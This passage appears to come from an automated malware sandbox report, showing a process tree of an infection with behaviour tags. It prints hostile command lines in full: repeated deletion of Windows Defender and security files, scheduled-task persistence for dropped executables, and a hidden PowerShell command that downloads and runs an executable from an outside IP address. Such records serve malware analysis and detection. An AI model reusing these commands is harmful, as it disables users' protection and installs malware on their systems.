                                                            • Loads dropped DLL
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:3528
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows 
Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:5044
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows 
Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:3132
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows 
Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:2600
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows 
Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:2132
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows 
Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:548
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows 
Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:4508
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows 
Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:3272
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows 
Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:5208
                                                          • C:\Windows\System32\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /c sc stop IObitUnlocker & sc delete IObitUnlocker
                                                            11⤵
                                                              PID:4560
                                                              • C:\Windows\system32\sc.exe
                                                                sc stop IObitUnlocker
                                                                12⤵
                                                                • Launches sc.exe
                                                                PID:3576
                                                              • C:\Windows\system32\sc.exe
                                                                sc delete IObitUnlocker
                                                                12⤵
                                                                • Launches sc.exe
                                                                PID:624
                                                            • C:\Windows\System32\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /c taskkill /f /pid "4388"
                                                              11⤵
                                                                PID:3280
                                                                • C:\Windows\system32\taskkill.exe
                                                                  taskkill /f /pid "4388"
                                                                  12⤵
                                                                  • Kills process with taskkill
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:1548
                                                            • C:\Users\Admin\AppData\Local\Temp\Work\Unlocker.exe
                                                              Unlocker /newDiskSize
                                                              10⤵
                                                              • Sets service image path in registry
                                                              • Checks computer location settings
                                                              • Executes dropped EXE
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:4084
                                                              • C:\Windows\System32\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /c sc query IObitUnlocker
                                                                11⤵
                                                                  PID:980
                                                                  • C:\Windows\system32\sc.exe
                                                                    sc query IObitUnlocker
                                                                    12⤵
                                                                    • Launches sc.exe
                                                                    PID:5008
                                                                • C:\Windows\System32\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /c sc stop IObitUnlocker & sc delete IObitUnlocker
                                                                  11⤵
                                                                    PID:2720
                                                                    • C:\Windows\system32\sc.exe
                                                                      sc stop IObitUnlocker
                                                                      12⤵
                                                                      • Launches sc.exe
                                                                      PID:3028
                                                                    • C:\Windows\system32\sc.exe
                                                                      sc delete IObitUnlocker
                                                                      12⤵
                                                                      • Launches sc.exe
                                                                      PID:2168
                                                                  • C:\Windows\System32\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /c taskkill /f /pid "4084"
                                                                    11⤵
                                                                      PID:1136
                                                                      • C:\Windows\system32\taskkill.exe
                                                                        taskkill /f /pid "4084"
                                                                        12⤵
                                                                        • Kills process with taskkill
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:3604
                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                    sc start VMTools
                                                                    10⤵
                                                                    • Launches sc.exe
                                                                    PID:5612
                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                    sc start VMTools
                                                                    10⤵
                                                                    • Launches sc.exe
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:2856
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c schtasks /create /tn "GgLfxM35V" /tr "C:\Temper\qUQ9sZlz.exe" /sc minute /mo 10 /ru "Admin" /f
                                                                8⤵
                                                                • System Location Discovery: System Language Discovery
                                                                • Suspicious use of WriteProcessMemory
                                                                PID:3036
                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                  schtasks /create /tn "GgLfxM35V" /tr "C:\Temper\qUQ9sZlz.exe" /sc minute /mo 10 /ru "Admin" /f
                                                                  9⤵
                                                                  • Scheduled Task/Job: Scheduled Task
                                                                  PID:732
                                                          • C:\Users\Admin\AppData\Local\Temp\10495480101\20563e3f9a.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\10495480101\20563e3f9a.exe"
                                                            6⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of FindShellTrayWindow
                                                            • Suspicious use of SendNotifyMessage
                                                            PID:5324
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c schtasks /create /tn PJSXAmabLH7 /tr "mshta C:\Users\Admin\Desktop\hYoO4p70j.hta" /sc minute /mo 10 /ru "Admin" /f
                                                              7⤵
                                                                PID:2964
                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                  schtasks /create /tn PJSXAmabLH7 /tr "mshta C:\Users\Admin\Desktop\hYoO4p70j.hta" /sc minute /mo 10 /ru "Admin" /f
                                                                  8⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  • Scheduled Task/Job: Scheduled Task
                                                                  PID:1900
                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                mshta C:\Users\Admin\Desktop\hYoO4p70j.hta
                                                                7⤵
                                                                • Checks computer location settings
                                                                • System Location Discovery: System Language Discovery
                                                                PID:4356
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:APPDATA+'S6RJX63P2HWW9RDOHNOKDGXGPVAARWXC.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.156.72.2/testmine/random.exe',$d);Start-Process $d;
                                                                  8⤵
                                                                  • Blocklisted process makes network request
                                                                  • Command and Scripting Interpreter: PowerShell
                                                                  • Downloads MZ/PE file
                                                                  • System Location Discovery: System Language Discovery
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:5960
                                                                  • C:\Users\Admin\AppData\RoamingS6RJX63P2HWW9RDOHNOKDGXGPVAARWXC.EXE
                                                                    "C:\Users\Admin\AppData\RoamingS6RJX63P2HWW9RDOHNOKDGXGPVAARWXC.EXE"
                                                                    9⤵
                                                                    • Executes dropped EXE
                                                                    PID:4828
                                                            • C:\Users\Admin\AppData\Local\Temp\10495790101\208f6d97e4.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\10495790101\208f6d97e4.exe"
                                                              6⤵
                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                              • Checks BIOS information in registry
                                                              • Executes dropped EXE
                                                              • Identifies Wine through registry keys
                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                              PID:4524
                                                            • C:\Users\Admin\AppData\Local\Temp\10495950101\amnew.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\10495950101\amnew.exe"
                                                              6⤵
                                                              • Checks computer location settings
                                                              • Executes dropped EXE
                                                              • Drops file in Windows directory
                                                              PID:2308
                                                              • C:\Users\Admin\AppData\Local\Temp\d96bd1b766\varen.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\d96bd1b766\varen.exe"
                                                                7⤵
                                                                • Executes dropped EXE
                                                                • System Location Discovery: System Language Discovery
                                                                PID:4336
                                                            • C:\Users\Admin\AppData\Local\Temp\10495960101\sFFG7Wg.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\10495960101\sFFG7Wg.exe"
                                                              6⤵
                                                              • Adds Run key to start application
                                                              PID:2284
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c start cmd /C "ping localhost -n 1 && start C:\Users\Admin\AppData\Local\GoogleChrome.exe"
                                                                7⤵
                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                PID:5684
                                                                • C:\Windows\system32\cmd.exe
                                                                  cmd /C "ping localhost -n 1 && start C:\Users\Admin\AppData\Local\GoogleChrome.exe"
                                                                  8⤵
                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                  PID:3200
                                                                  • C:\Windows\system32\PING.EXE
                                                                    ping localhost -n 1
                                                                    9⤵
                                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                                    • Runs ping.exe
                                                                    PID:5152
                                                                  • C:\Users\Admin\AppData\Local\GoogleChrome.exe
                                                                    C:\Users\Admin\AppData\Local\GoogleChrome.exe
                                                                    9⤵
                                                                      PID:6068
                                                              • C:\Users\Admin\AppData\Local\Temp\10495970101\Fv6kVbJ.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\10495970101\Fv6kVbJ.exe"
                                                                6⤵
                                                                • Suspicious use of SetThreadContext
                                                                PID:4744
                                                                • C:\Users\Admin\AppData\Local\Temp\10495970101\Fv6kVbJ.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\10495970101\Fv6kVbJ.exe"
                                                                  7⤵
                                                                    PID:6072
                                                                • C:\Users\Admin\AppData\Local\Temp\10495980101\blOahSM.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\10495980101\blOahSM.exe"
                                                                  6⤵
                                                                  • Checks computer location settings
